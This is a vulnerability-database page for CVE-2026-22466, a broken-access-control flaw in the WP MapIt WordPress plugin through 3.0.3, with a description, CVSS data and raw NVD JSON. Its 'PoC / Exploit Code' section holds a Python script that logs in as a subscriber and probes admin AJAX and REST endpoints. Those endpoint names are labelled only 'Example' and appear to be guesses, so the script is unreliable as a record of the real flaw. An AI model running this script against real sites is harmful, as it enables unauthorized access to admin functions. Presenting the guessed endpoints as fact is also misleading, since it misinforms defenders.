Security Vulnerability Report
中文
CVE-2026-22466 CVSS 4.3 MEDIUM

CVE-2026-22466

Published: 2026-01-22 17:16:35
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Chandni Patel WP MapIt wp-mapit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP MapIt: from n/a through <= 3.0.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP MapIt <= 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-22466 PoC - WP MapIt Broken Access Control # Target: WordPress site with WP MapIt plugin <= 3.0.3 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-site.com' # Authentication required (low-privilege user) username = 'subscriber' password = 'userpassword' # Login to WordPress session = requests.Session() login_url = f'{target}/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Exploit: Access admin-only functionality without proper authorization # Example: Trigger map-related admin action vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=wp_mapit_admin_action', '/wp-json/wp-mapit/v1/admin/settings' ] for endpoint in vulnerable_endpoints: url = target + endpoint response = session.get(url) if response.status_code == 200: print(f'[+] Vulnerable endpoint found: {url}') print(f'[+] Response: {response.text[:500]}') print('[+] Testing complete - Check for unauthorized access')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22466", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:35.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Chandni Patel WP MapIt wp-mapit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP MapIt: from n/a through <= 3.0.3."}, {"lang": "es", "value": "Vulnerabilidad de Autorización faltante en Chandni Patel WP MapIt wp-mapit permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WP MapIt: desde n/a hasta &lt;= 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-mapit/vulnerability/wordpress-wp-mapit-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}